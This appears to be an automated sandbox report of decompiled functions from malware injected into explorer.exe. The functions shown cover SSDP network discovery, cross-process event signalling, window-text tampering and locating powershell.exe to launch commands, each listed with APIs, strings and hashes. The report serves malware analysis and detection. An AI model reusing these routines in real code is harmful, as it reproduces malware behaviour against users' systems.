API String ID: 3558556355-3128660802
Opcode ID: 16bd61750c08f7213c6b43c04ab7c6b331f55d20dab6da39df9f4836b3952baa
Instruction ID: 7af7f836a5d08fb0e997259e3e8308bcd2a8aed71939d6927790087867d44904
Opcode Fuzzy Hash: 16bd61750c08f7213c6b43c04ab7c6b331f55d20dab6da39df9f4836b3952baa
Instruction Fuzzy Hash: 6121E7B5D4521CE6EF22E760AD43FB97638AB10704F0405B9FB057B2C2EAB55618CB62

Uniqueness

Uniqueness Score: 100.00%

Function 0150B30F, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 66
UNIQUE

Download Yara Rule

C-Code - Quality: 45%

			E0150B30F() {
				intOrPtr _t156;
				intOrPtr _t159;
				intOrPtr _t175;
				intOrPtr _t179;
				intOrPtr _t187;
				intOrPtr _t189;
				void* _t256;
				void* _t258;
				void* _t260;
				void* _t261;

				L0:
				while(1) {
					L0:
					 *(_t256 - 0x708) =  *(_t256 - 0x708) + 1;
					if( *((intOrPtr*)(0x152a740 +  *(_t256 - 0x708) * 4)) == 0) {
						break;
					}
					L2:
					if( *((intOrPtr*)(_t256 - 0x44)) != 0) {
						L33:
						_push(_t256 - 0x70c);
						_t159 = E0150E590( *((intOrPtr*)(_t256 - 0x6d4)), _t256 - 0x648, 0x600,  *((intOrPtr*)(_t256 + 8)));
						_t260 = _t258 + 0x14;
						 *((intOrPtr*)(_t256 - 0x44)) = _t159;
						if( *((intOrPtr*)(_t256 - 0x44)) >= 0) {
							L37:
							if( *((intOrPtr*)(_t256 - 0x44)) != 0) {
								L47:
								 *(_t256 - 0x73c) = 0;
								 *(_t256 - 0x734) = 0;
								 *(_t256 - 0x730) = 0;
								 *(_t256 - 0x738) = 0;
								E0150B7B0(_t256 - 0x648,  *((intOrPtr*)(_t256 - 0x44)), _t256 - 0x73c, _t256 - 0x734, _t256 - 0x730, _t256 - 0x738);
								_t261 = _t260 + 0x18;
								if( *(_t256 - 0x730) == 0 ||  *(_t256 - 0x73c) == 0) {
									goto L65;
								} else {
									L49:
									 *((intOrPtr*)(_t256 - 0x6d0)) =  *((intOrPtr*)(_t256 - 0x6e0));
									L51:
									while( *((intOrPtr*)(_t256 - 0x6d0)) != 0) {
										_push( *(_t256 - 0x734));
										_push( *(_t256 - 0x73c));
										_t175 =  *((intOrPtr*)(_t256 - 0x6d0));
										_push( *((intOrPtr*)(_t175 + 4)));
										L015077DC();
										_t261 = _t261 + 0xc;
										if(_t175 != 0 ||  *((char*)( *((intOrPtr*)( *((intOrPtr*)(_t256 - 0x6d0)) + 4)) +  *(_t256 - 0x734))) != 0) {
											L57:
											 *((intOrPtr*)(_t256 - 0x6d0)) =  *((intOrPtr*)( *((intOrPtr*)(_t256 - 0x6d0))));
											continue;
										} else {
											L54:
											_push( *(_t256 - 0x738));
											_push( *(_t256 - 0x730));
											_t179 =  *((intOrPtr*)( *((intOrPtr*)(_t256 - 0x6d0)) + 8));
											_push(_t179);
											L015077DC();
											_t261 = _t261 + 0xc;
											if(_t179 != 0 ||  *((char*)( *((intOrPtr*)( *((intOrPtr*)(_t256 - 0x6d0)) + 8)) +  *(_t256 - 0x738))) != 0) {
												goto L57;
											}
										}
										break;
									}
									L58:
									if( *((intOrPtr*)(_t256 - 0x6d0)) == 0) {
										L60:
										_t112 =  *(_t256 - 0x738) + 0x14; // 0x14
										 *((intOrPtr*)(_t256 - 0x6d0)) = E01513960( *(_t256 - 0x734) + _t112,  *(_t256 - 0x734) + _t112);
										if( *((intOrPtr*)(_t256 - 0x6d0)) != 0) {
											L64:
											 *((intOrPtr*)( *((intOrPtr*)(_t256 - 0x6d0)))) =  *((intOrPtr*)(_t256 - 0x6e0));
											 *((intOrPtr*)( *((intOrPtr*)(_t256 - 0x6d0)) + 4)) =  *((intOrPtr*)(_t256 - 0x6d0)) + 0x10;
											_t125 =  *(_t256 - 0x734) + 0x11; // 0x11
											 *((intOrPtr*)( *((intOrPtr*)(_t256 - 0x6d0)) + 8)) =  *((intOrPtr*)(_t256 - 0x6d0)) + _t125;
											memcpy( *((intOrPtr*)(_t256 - 0x6d0)) + 0x10,  *(_t256 - 0x73c),  *(_t256 - 0x734));
											 *((char*)( *((intOrPtr*)(_t256 - 0x6d0)) +  *(_t256 - 0x734) + 0x10)) = 0;
											_t139 =  *(_t256 - 0x734) + 0x11; // 0x11
											memcpy( *((intOrPtr*)(_t256 - 0x6d0)) + _t139,  *(_t256 - 0x730),  *(_t256 - 0x738));
											_t143 =  *(_t256 - 0x738) + 1; // 0x1
											 *((char*)( *((intOrPtr*)(_t256 - 0x6d0)) +  *(_t256 - 0x734) + _t143 + 0x10)) = 0;
											 *((intOrPtr*)( *((intOrPtr*)(_t256 - 0x6d0)) + 0xc)) =  *((intOrPtr*)(_t256 - 0x70c));
											 *((intOrPtr*)(_t256 - 0x6e0)) =  *((intOrPtr*)(_t256 - 0x6d0));
											goto L65;
										} else {
											L61:
											if( *(_t256 + 0x1c) != 0) {
												 *( *(_t256 + 0x1c)) = 0xffffff9a;
											}
										}
									} else {
										L59:
										continue;
									}
								}
							} else {
								L38:
								if( *((intOrPtr*)(_t256 - 0x6e0)) == 0) {
									L42:
									if( *((intOrPtr*)(_t256 + 0x18)) != 0) {
										if( *(_t256 - 4) == 0) {
											 *(_t256 - 4) = 1;
										} else {
											 *(_t256 - 4) = 0;
											 *(_t256 - 0x708) =  *(_t256 - 0x708) - 1;
										}
									}
									L65:
									continue;
								} else {
									L39:
									if( *(_t256 + 0x1c) != 0) {
										 *( *(_t256 + 0x1c)) = 0;
									}
								}
							}
						} else {
							L34:
							if( *(_t256 + 0x1c) != 0) {
								 *( *(_t256 + 0x1c)) = 0xffffff9b;
							}
						}
					} else {
						L3:
						if( *((intOrPtr*)(_t256 + 0x18)) == 0) {
							 *(_t256 - 0x744) = "239.255.255.250";
						} else {
							if( *(_t256 - 4) == 0) {
								 *(_t256 - 0x740) = "[FF05::C]";
							} else {
								 *(_t256 - 0x740) = "[FF02::C]";
							}
							 *(_t256 - 0x744) =  *(_t256 - 0x740);
						}
						_push( *((intOrPtr*)(_t256 - 0x6dc)));
						_push( *((intOrPtr*)(0x152a740 +  *(_t256 - 0x708) * 4)));
						 *((intOrPtr*)(_t256 - 0x44)) = E01513C30(_t256 - 0x648, 0x600, "M-SEARCH * HTTP/1.1\r\nHOST: %s:1900\r\nST: %s\r\nMAN: \"ssdp:discover\"\r\nMX: %u\r\n\r\n",  *(_t256 - 0x744));
						memset(_t256 - 0x704, 0, 0x20);
						_t258 = _t258 + 0x24;
						 *(_t256 - 0x700) = 0;
						 *((intOrPtr*)(_t256 - 0x6fc)) = 2;
						if( *((intOrPtr*)(_t256 + 0x18)) == 0) {
							 *(_t256 - 0x74c) = "239.255.255.250";
						} else {
							if( *(_t256 - 4) == 0) {
								 *(_t256 - 0x748) = "FF05::C";
							} else {
								 *(_t256 - 0x748) = "FF02::C";
							}
							 *(_t256 - 0x74c) =  *(_t256 - 0x748);
						}
						_t187 = _t256 - 0x6d8;
						__imp__getaddrinfo( *(_t256 - 0x74c), "1900", _t256 - 0x704, _t187);
						 *((intOrPtr*)(_t256 - 0x6e4)) = _t187;
						if( *((intOrPtr*)(_t256 - 0x6e4)) == 0) {
							L21:
							 *((intOrPtr*)(_t256 - 0x40)) =  *((intOrPtr*)(_t256 - 0x6d8));
							L23:
							while( *((intOrPtr*)(_t256 - 0x40)) != 0) {
								_t189 =  *((intOrPtr*)(_t256 - 0x44));
								__imp__#20( *((intOrPtr*)(_t256 - 0x6d4)), _t256 - 0x648, _t189, 0,  *((intOrPtr*)( *((intOrPtr*)(_t256 - 0x40)) + 0x18)),  *((intOrPtr*)( *((intOrPtr*)(_t256 - 0x40)) + 0x10)));
								 *((intOrPtr*)(_t256 - 0x44)) = _t189;
								if( *((intOrPtr*)(_t256 - 0x44)) >= 0) {
									L28:
									goto L22;
								} else {
									L25:
									while(0 != 0) {
									}
									L22:
									 *((intOrPtr*)(_t256 - 0x40)) =  *((intOrPtr*)( *((intOrPtr*)(_t256 - 0x40)) + 0x1c));
									continue;
								}
								break;
							}
							L29:
							__imp__freeaddrinfo( *((intOrPtr*)(_t256 - 0x6d8)));
							if( *((intOrPtr*)(_t256 - 0x44)) >= 0) {
								goto L33;
							} else {
								L30:
								if( *(_t256 + 0x1c) != 0) {
									 *( *(_t256 + 0x1c)) = 0xffffff9b;
								}
							}
						} else {
							L16:
							if( *(_t256 + 0x1c) != 0) {
								 *( *(_t256 + 0x1c)) = 0xffffff9b;
							}
							L18:
							while(0 != 0) {
							}
						}
					}
					break;
				}
				L66:
				__imp__#3( *((intOrPtr*)(_t256 - 0x6d4)));
				_t156 =  *((intOrPtr*)(_t256 - 0x6e0));
				return _t156;
			}

0x0150b30f
0x0150b30f
0x0150b30f
0x0150b318
0x0150b32c
0x00000000
0x00000000
0x0150b332
0x0150b336
0x0150b4d4
0x0150b4da
0x0150b4f2
0x0150b4f7
0x0150b4fa
0x0150b501
0x0150b51c
0x0150b520
0x0150b56f
0x0150b56f
0x0150b579
0x0150b583
0x0150b58d
0x0150b5be
0x0150b5c3
0x0150b5cd
0x00000000
0x0150b5e0
0x0150b5e0
0x0150b5e6
0x00000000
0x0150b5fc
0x0150b60b
0x0150b612
0x0150b613
0x0150b61c
0x0150b61d
0x0150b622
0x0150b627
0x0150b67d
0x0150b5f6
0x00000000
0x0150b640
0x0150b640
0x0150b646
0x0150b64d
0x0150b654
0x0150b657
0x0150b658
0x0150b65d
0x0150b662
0x00000000
0x00000000
0x0150b662
0x00000000
0x0150b627
0x0150b682
0x0150b689
0x0150b690
0x0150b69c
0x0150b6a9
0x0150b6b6
0x0150b6cc
0x0150b6d8
0x0150b6e9
0x0150b6f8
0x0150b702
0x0150b71d
0x0150b731
0x0150b74f
0x0150b754
0x0150b768
0x0150b772
0x0150b783
0x0150b78c
0x00000000
0x0150b6b8
0x0150b6b8
0x0150b6bc
0x0150b6c1
0x0150b6c1
0x0150b6c7
0x0150b68b
0x0150b68b
0x00000000
0x0150b68b
0x0150b689
0x0150b522
0x0150b522
0x0150b529
0x0150b53f
0x0150b543
0x0150b549
0x0150b563
0x0150b54b
0x0150b54b
0x0150b55b
0x0150b55b
0x0150b549
0x0150b792
0x00000000
0x0150b52b
0x0150b52b
0x0150b52f
0x0150b534
0x0150b534
0x0150b53a
0x0150b529
0x0150b503
0x0150b503
0x0150b507
0x0150b50c
0x0150b50c
0x0150b512
0x0150b33c
0x0150b33c
0x0150b340
0x0150b36c
0x0150b342
0x0150b346
0x0150b354
0x0150b348
0x0150b348
0x0150b348
0x0150b364
0x0150b364
0x0150b37c
0x0150b38a
0x0150b3ab
0x0150b3b9
0x0150b3be
0x0150b3c1
0x0150b3cb
0x0150b3d9
0x0150b405
0x0150b3db
0x0150b3df
0x0150b3ed
0x0150b3e1
0x0150b3e1
0x0150b3e1
0x0150b3fd
0x0150b3fd
0x0150b40f
0x0150b429
0x0150b42f
0x0150b43c
0x0150b458
0x0150b45e
0x00000000
0x0150b46c
0x0150b482
0x0150b494
0x0150b49a
0x0150b4a1
0x0150b4ab
0x00000000
0x0150b4a3
0x00000000
0x0150b4a3
0x0150b4a7
0x0150b463
0x0150b469
0x00000000
0x0150b469
0x00000000
0x0150b4a1
0x0150b4ad
0x0150b4b4
0x0150b4be
0x00000000
0x0150b4c0
0x0150b4c0
0x0150b4c4
0x0150b4c9
0x0150b4c9
0x0150b4cf
0x0150b43e
0x0150b43e
0x0150b442
0x0150b447
0x0150b447
0x00000000
0x0150b44d
0x0150b451
0x0150b453
0x0150b43c
0x00000000
0x0150b336
0x0150b797
0x0150b79e
0x0150b7a4
0x0150b7ad

APIs

memset.MSVCRT(?,00000000,00000020), ref: 0150B3B9
getaddrinfo.WS2_32(0153566C,1900,?,?), ref: 0150B429
#20.WS2_32(00000000,?,00000000,00000000,?,?), ref: 0150B494
freeaddrinfo.WS2_32(?), ref: 0150B4B4
#3.WS2_32(00000000), ref: 0150B79E

Strings

1900, xrefs: 0150B41D
M-SEARCH * HTTP/1.1HOST: %s:1900ST: %sMAN: "ssdp:discover"MX: %u, xrefs: 0150B392
[FF02::C], xrefs: 0150B348
FF02::C, xrefs: 0150B3E1

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID: freeaddrinfogetaddrinfomemset
String ID: 1900$FF02::C$M-SEARCH * HTTP/1.1HOST: %s:1900ST: %sMAN: "ssdp:discover"MX: %u$[FF02::C]
API String ID: 306978428-779296666
Opcode ID: 009669ddbb0d46b9de74eda602e4efae64ee26c89d8f2df3da8c745ea353c2ea
Instruction ID: c5c94c0860aca41aa5a0d6ef9efdc10756287cf98627fd671b9de50ed84810da
Opcode Fuzzy Hash: 009669ddbb0d46b9de74eda602e4efae64ee26c89d8f2df3da8c745ea353c2ea
Instruction Fuzzy Hash: EF3104B9D04219DBEB76CF88D888BEDB7B1FB84304F148199D60D6A280D7796A94CF41

Uniqueness

Uniqueness Score: 100.00%

Function 003F16F0, Relevance: 10.6, APIs: 7, Instructions: 64
UNIQUE

Download Yara Rule

C-Code - Quality: 68%

			E003F16F0(intOrPtr _a4) {
				int _v8;
				void _v47;
				char _v48;
				void* _v52;
				char _t16;

				_v52 = 0;
				_v8 = 0;
				_t16 =  *0x40f6d8; // 0x0
				_v48 = _t16;
				memset( &_v47, 0, 0x27);
				if( *((intOrPtr*)(_a4 + 8)) != GetCurrentProcessId()) {
					E003F6FE0( &_v48, E003F46E0(_a4 + 0x24, 0x5c),  *((intOrPtr*)(_a4 + 8)));
					_v52 = OpenEventA(2, 0,  &_v48);
					if(_v52 != 0) {
						if(SetEvent(_v52) != 0) {
							L7:
							CloseHandle(_v52);
							SleepEx(0x64, 1);
							return 1;
						}
						while(0 != 0) {
						}
						goto L7;
					}
					SleepEx(1, 1);
					return 1;
				}
				return 1;
			}

0x003f16f6
0x003f16fd
0x003f1704
0x003f1709
0x003f1714
0x003f1728
0x003f174e
0x003f1764
0x003f176b
0x003f178a
0x003f1792
0x003f1796
0x003f17a0
0x00000000
0x003f17a6
0x003f178c
0x003f1790
0x00000000
0x003f178c
0x003f1771
0x00000000
0x003f1777
0x00000000

APIs

memset.MSVCRT(?,00000000,00000027), ref: 003F1714
GetCurrentProcessId.KERNEL32 ref: 003F171C
OpenEventA.KERNEL32(00000002,00000000,?,?,?,?,?,?), ref: 003F175E
SleepEx.KERNEL32(00000001,00000001,?,?,?,?,?), ref: 003F1771

Memory Dump Source

Source File: 0000000C.00000002.752639572.003F0000.00000040.00000001.sdmp, Offset: 003F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_3f0000_explorer.jbxd

Yara matches

Similarity

API ID: CurrentEventOpenProcessSleepmemset
String ID:
API String ID: 4113282985-0
Opcode ID: ad9b1e9fd868960685f56824b7b32041da8a80ebaa7aadbeae617a3248c55bdb
Instruction ID: 1aa1a928d37e01802eec2ebb41535ba71b87c680f3f46adbc43ef8fca0dd5e09
Opcode Fuzzy Hash: ad9b1e9fd868960685f56824b7b32041da8a80ebaa7aadbeae617a3248c55bdb
Instruction Fuzzy Hash: 43215775910208EFEB01ABA0ED49FBE7774EB04705F008128FE05AB291E7759948CBA5

Uniqueness

Uniqueness Score: 100.00%

Function 01519E50, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E01519E50(struct HWND__* _a4, CHAR* _a8, int _a12) {
				int _v8;
				CHAR* _v12;

				_v8 = GetWindowTextA(_a4, _a8, _a12);
				if(_a12 > 0x64 && (GetWindowLongA(_a4, 0xfffffff0) & 0x00000020) != 0 && GetWindowLongA(_a4, 0xfffffff4) == 0x3fc) {
					_v12 = E01519EF0(0x1538878);
					if(_v12 == 0) {
						_v8 = 0;
					} else {
						lstrcpyA(_a8, _v12);
						_v8 = lstrlenA(_a8);
						E01513990( &_v12, 0);
					}
				}
				return _v8;
			}

0x01519e68
0x01519e6f
0x01519ea2
0x01519ea9
0x01519ed6
0x01519eab
0x01519eb3
0x01519ec3
0x01519ecc
0x01519ed1
0x01519ea9
0x01519ee3

APIs

GetWindowTextA.USER32(?,?,?), ref: 01519E62
GetWindowLongA.USER32(?,000000F0), ref: 01519E77
GetWindowLongA.USER32(?,000000F4), ref: 01519E88

Part of subcall function 01519EF0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000064,000000FF,00000000,00000000,00000000,00000000), ref: 01519F0F
Part of subcall function 01519EF0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000064,000000FF,00000000,00000064,00000000,00000000), ref: 01519F5B

lstrcpyA.KERNEL32(?,00000000), ref: 01519EB3
lstrlenA.KERNEL32(?), ref: 01519EBD

Part of subcall function 01513990: lstrlenA.KERNEL32(01515216,?,0151546E,01516857,000000FF), ref: 015139A7
Part of subcall function 01513990: HeapFree.KERNEL32(018E0000,00000000,00000000), ref: 015139EA

Strings

d, xrefs: 01519E6B

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID: Window$ByteCharLongMultiWidelstrlen$FreeHeapTextlstrcpy
String ID: d
API String ID: 774041997-2564639436
Opcode ID: fdbe0c5698b57e6a9ad102636f8f3f16db5699e49125b50a980d143d15d75d7b
Instruction ID: 100a0faef787f93fbe01e450edda34115c62fde2bf1744490cea12829021a606
Opcode Fuzzy Hash: fdbe0c5698b57e6a9ad102636f8f3f16db5699e49125b50a980d143d15d75d7b
Instruction Fuzzy Hash: BD11737A900208EFDB21DFA8D848E9E7BB5BB89310F108A18F9159F644D735D644DB51

Uniqueness

Uniqueness Score: 1.85%

Function 01520E00, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E01520E00(void* __ecx) {
				struct HINSTANCE__* _v8;
				CHAR* _v12;
				_Unknown_base(*)()* _v16;
				struct HINSTANCE__* _v24;
				intOrPtr _v28;
				struct HINSTANCE__* _t35;

				_v12 = E01515350(__ecx, 0x925);
				_v8 = LoadLibraryA(_v12);
				E01515460( &_v12);
				if(_v8 == 0) {
					L3:
					return GetTickCount() / 0x3e8;
				}
				_t35 = _v8;
				_v16 = GetProcAddress(_t35, "GetTickCount64");
				if(_v16 == 0) {
					goto L3;
				}
				_v28 = E015217B0(_v16(), _t35, 0x3e8, 0);
				_v24 = _t35;
				FreeLibrary(_v8);
				return _v28;
			}

0x01520e13
0x01520e20
0x01520e27
0x01520e33
0x01520e76
0x00000000
0x01520e85
0x01520e3a
0x01520e44
0x01520e4b
0x00000000
0x00000000
0x01520e5e
0x01520e61
0x01520e68
0x00000000

APIs

LoadLibraryA.KERNEL32(?,?,?,?,0150996C,readrr956964,?,?,readrr956964,?,00000000,?,?), ref: 01520E1A
GetProcAddress.KERNEL32(00000000,GetTickCount64,?,?,?,?,0150996C,readrr956964,?), ref: 01520E3E
__aulldiv.LIBCMT ref: 01520E59
FreeLibrary.KERNEL32(00000000,00000000,?,000003E8,00000000,?,?,?,?,0150996C), ref: 01520E68
GetTickCount.KERNEL32(?,?,?,?,0150996C,readrr956964,?), ref: 01520E76

Strings

GetTickCount64, xrefs: 01520E35

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID: Library$AddressCountFreeLoadProcTick__aulldiv
String ID: GetTickCount64
API String ID: 645485922-1367338760
Opcode ID: 113ef281fbd067de5fae6d44154b2520b0c59a157c7fe718a6640a27333ff462
Instruction ID: 6cca58a2a66ee99a27d25eb92cfa3ee5d02910b0bb4f5411930b4e1e0b818777
Opcode Fuzzy Hash: 113ef281fbd067de5fae6d44154b2520b0c59a157c7fe718a6640a27333ff462
Instruction Fuzzy Hash: B30192B6D00209EFDB14DFE4D849BAEBBB8BF89301F108555E505AB284EB345B44CB91

Uniqueness

Uniqueness Score: 12.89%

Function 01519DE0, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 37
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E01519DE0(void* __ecx, struct HWND__* _a4, WCHAR* _a8, int _a12) {
				int _v8;

				_v8 = GetWindowTextW(_a4, _a8, _a12);
				if(_a12 > 0x64 && (GetWindowLongA(_a4, 0xfffffff0) & 0x00000020) != 0 && GetWindowLongA(_a4, 0xfffffff4) == 0x3fc) {
					lstrcpyW(_a8, 0x1538878);
					_v8 = lstrlenW(_a8);
				}
				return _v8;
			}

0x01519df6
0x01519dfd
0x01519e2c
0x01519e3c
0x01519e3c
0x01519e45

APIs

GetWindowTextW.USER32(?,?,?), ref: 01519DF0
GetWindowLongA.USER32(?,000000F0), ref: 01519E05
GetWindowLongA.USER32(?,000000F4), ref: 01519E16
lstrcpyW.KERNEL32(?,01538878), ref: 01519E2C
lstrlenW.KERNEL32(?), ref: 01519E36

Strings

d, xrefs: 01519DF9

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID: Window$Long$Textlstrcpylstrlen
String ID: d
API String ID: 3832540958-2564639436
Opcode ID: 64c9e793556e71cd681f6067fb841010f0f2b895eb6110c831a3e4cf338f6aa5
Instruction ID: f5b9349db0723db00d87beb35b50995ca84e090984bd9f61458cd3ae2f43c655
Opcode Fuzzy Hash: 64c9e793556e71cd681f6067fb841010f0f2b895eb6110c831a3e4cf338f6aa5
Instruction Fuzzy Hash: 84011D76500248AFDB24CF98D848DAE7779FB8A360F108B08F925DB248C731DA40DB50

Uniqueness

Uniqueness Score: 1.85%

Function 0151CFD0, Relevance: 9.2, APIs: 1, Strings: 5, Instructions: 208
stringUNIQUE

Download Yara Rule

C-Code - Quality: 65%

			E0151CFD0(void* __ecx, intOrPtr _a4, signed int _a8) {
				char _v8;
				signed int _v12;
				signed int _v16;
				char _v48;
				signed int _v52;
				char _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				int _v72;
				signed int _t73;
				signed int _t75;
				signed int _t89;
				signed int _t96;
				signed int _t97;
				signed int _t101;
				signed int _t106;
				void* _t109;
				signed int _t110;
				WCHAR* _t119;
				signed int _t128;
				signed int _t131;
				signed int _t134;
				void* _t137;
				void* _t138;
				void* _t140;

				_t109 = __ecx;
				_v12 = 0;
				_v8 = 0;
				while(0 != 0) {
				}
				_t73 = E01513960(_t109, 0x412);
				_t138 = _t137 + 4;
				_v12 = _t73;
				__eflags = _v12;
				if(_v12 != 0) {
					_t110 =  *0x153a748; // 0x0
					__eflags = _t110 & 0x00000200;
					if(__eflags != 0) {
						L9:
						_v16 = 0;
						_v52 = 0;
						_t112 =  &_v48;
						E01516A50(__eflags,  &_v48, 7, 0xf, 0x15394fc);
						_t75 = E01517710(L"PATH");
						_t140 = _t138 + 0x14;
						_v16 = _t75;
						__eflags = _v16;
						if(_v16 == 0) {
							L30:
							__eflags = _v52;
							if(_v52 == 0) {
								while(1) {
									__eflags = 0;
									if(0 == 0) {
										break;
									}
								}
								__eflags = _a8;
								if(_a8 == 0) {
									_v8 = E01515230(0, 0x27ee);
								} else {
									_v8 = E01515230(0, 0x1cd4);
								}
								_push(_a4);
								E01513CA0(_v12, 0x208, _v8, "C:\Windows");
								L41:
								E01515460( &_v8);
								while(1) {
									L45:
									__eflags = 0;
									if(0 == 0) {
										break;
									}
								}
								return _v12;
							}
							__eflags = _a8;
							if(_a8 == 0) {
								_v8 = E01515230(_t112, 0x1912);
							} else {
								_v8 = E01515230(_t112, 0x2ad6);
							}
							_push(_a4);
							E01513CA0(_v12, 0x208, _v8, _v52);
							E01513990( &_v52, 0xfffffffe);
							goto L41;
						}
						_v60 = 0;
						while(1) {
							__eflags = 0;
							if(0 == 0) {
								break;
							}
						}
						_t112 = _v16;
						_t89 = E01517340(_v16, 0x3b, 0,  &_v56);
						_t140 = _t140 + 0x10;
						_v60 = _t89;
						__eflags = _v60;
						if(_v60 == 0) {
							goto L30;
						}
						_v64 = 0;
						_v64 = 0;
						while(1) {
							__eflags = _v64 - _v56;
							if(_v64 >= _v56) {
								goto L30;
							}
							_v68 = 0;
							_v72 = lstrlenW( *(_v60 + _v64 * 4));
							while(1) {
								__eflags = 0;
								if(0 == 0) {
									break;
								}
							}
							_t119 =  *(_v60 + _v64 * 4);
							_t128 = _v72;
							__eflags = ( *(_t119 + _t128 * 2 - 2) & 0x0000ffff) - 0x5c;
							if(( *(_t119 + _t128 * 2 - 2) & 0x0000ffff) != 0x5c) {
								_push(0);
								_push(L"powershell.exe");
								_push("\\");
								_t112 = _v64;
								_t96 = E01516F50( *(_v60 + _v64 * 4));
								_t140 = _t140 + 0x10;
								_v68 = _t96;
							} else {
								_push(0);
								_push(L"powershell.exe");
								_t112 = _v64;
								_t101 = E01516F50( *(_v60 + _v64 * 4));
								_t140 = _t140 + 0xc;
								_v68 = _t101;
							}
							__eflags = _v68;
							if(_v68 == 0) {
								L29:
								_t131 = _v64 + 1;
								__eflags = _t131;
								_v64 = _t131;
								continue;
							} else {
								_t112 = _v68;
								_t97 = E0151BCE0(_v68, _v68);
								_t140 = _t140 + 4;
								__eflags = _t97;
								if(_t97 == 0) {
									_t112 =  &_v68;
									E01513990( &_v68, 0xfffffffe);
									_t140 = _t140 + 8;
									goto L29;
								} else {
									goto L25;
								}
								while(1) {
									L25:
									__eflags = 0;
									if(0 == 0) {
										break;
									}
								}
								_v52 = _v68;
								goto L30;
							}
						}
						goto L30;
					}
					_t134 =  *0x153a748; // 0x0
					__eflags = _t134 & 0x00004000;
					if(__eflags != 0) {
						goto L9;
					}
					__eflags =  *0x1538aa4 - 0xa;
					if( *0x1538aa4 < 0xa) {
						L42:
						__eflags = _a8;
						if(_a8 == 0) {
							E01513CA0(_v12, 0x208, L"\"%s\"", _a4);
						} else {
							E01513CA0(_v12, 0x208, L"\\\"%s\\\"", _a4);
						}
						goto L45;
					}
					_t106 =  *0x153a748; // 0x0
					__eflags = _t106 & 0x00000004;
					if(__eflags == 0) {
						goto L42;
					}
					goto L9;
				}
				return 0;
			}

0x0151cfd0
0x0151cfd6
0x0151cfdd
0x0151cfe4
0x0151cfe8
0x0151cfef
0x0151cff4
0x0151cff7
0x0151cffa
0x0151cffe
0x0151d007
0x0151d00d
0x0151d013
0x0151d03e
0x0151d03e
0x0151d045
0x0151d055
0x0151d059
0x0151d066
0x0151d06b
0x0151d06e
0x0151d071
0x0151d075
0x0151d17a
0x0151d17a
0x0151d17e
0x0151d1d5
0x0151d1d5
0x0151d1d7
0x00000000
0x00000000
0x0151d1d9
0x0151d1db
0x0151d1df
0x0151d200
0x0151d1e1
0x0151d1ee
0x0151d1ee
0x0151d206
0x0151d219
0x0151d221
0x0151d225
0x0151d26b
0x0151d26b
0x0151d26b
0x0151d26d
0x00000000
0x00000000
0x0151d26f
0x00000000
0x0151d271
0x0151d180
0x0151d184
0x0151d1a5
0x0151d186
0x0151d193
0x0151d193
0x0151d1ab
0x0151d1bd
0x0151d1cb
0x00000000
0x0151d1d0
0x0151d07b
0x0151d082
0x0151d082
0x0151d084
0x00000000
0x00000000
0x0151d086
0x0151d090
0x0151d094
0x0151d099
0x0151d09c
0x0151d09f
0x0151d0a3
0x00000000
0x00000000
0x0151d0a9
0x0151d0b0
0x0151d0c2
0x0151d0c5
0x0151d0c8
0x00000000
0x00000000
0x0151d0ce
0x0151d0e5
0x0151d0e8
0x0151d0e8
0x0151d0ea
0x00000000
0x00000000
0x0151d0ec
0x0151d0f4
0x0151d0f7
0x0151d0ff
0x0151d102
0x0151d122
0x0151d124
0x0151d129
0x0151d12e
0x0151d138
0x0151d13d
0x0151d140
0x0151d104
0x0151d104
0x0151d106
0x0151d10b
0x0151d115
0x0151d11a
0x0151d11d
0x0151d11d
0x0151d143
0x0151d147
0x0151d175
0x0151d0bc
0x0151d0bc
0x0151d0bf
0x00000000
0x0151d149
0x0151d149
0x0151d14d
0x0151d152
0x0151d155
0x0151d157
0x0151d169
0x0151d16d
0x0151d172
0x00000000
0x00000000
0x00000000
0x00000000
0x0151d159
0x0151d159
0x0151d159
0x0151d15b
0x00000000
0x00000000
0x0151d15d
0x0151d162
0x00000000
0x0151d162
0x0151d147
0x00000000
0x0151d0c2
0x0151d015
0x0151d01b
0x0151d021
0x00000000
0x00000000
0x0151d023
0x0151d02a
0x0151d22f
0x0151d22f
0x0151d233
0x0151d263
0x0151d235
0x0151d247
0x0151d24c
0x00000000
0x0151d233
0x0151d030
0x0151d035
0x0151d038
0x00000000
0x00000000
0x00000000
0x0151d038
0x00000000

APIs

lstrlenW.KERNEL32(?), ref: 0151D0DF

Strings

PATH, xrefs: 0151D061
powershell.exe, xrefs: 0151D106, 0151D124
"%s", xrefs: 0151D255
\"%s\", xrefs: 0151D239
C:\Windows, xrefs: 0151D207

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID: lstrlen
String ID: "%s"$C:\Windows$PATH$\"%s\"$powershell.exe
API String ID: 1659193697-1281834030
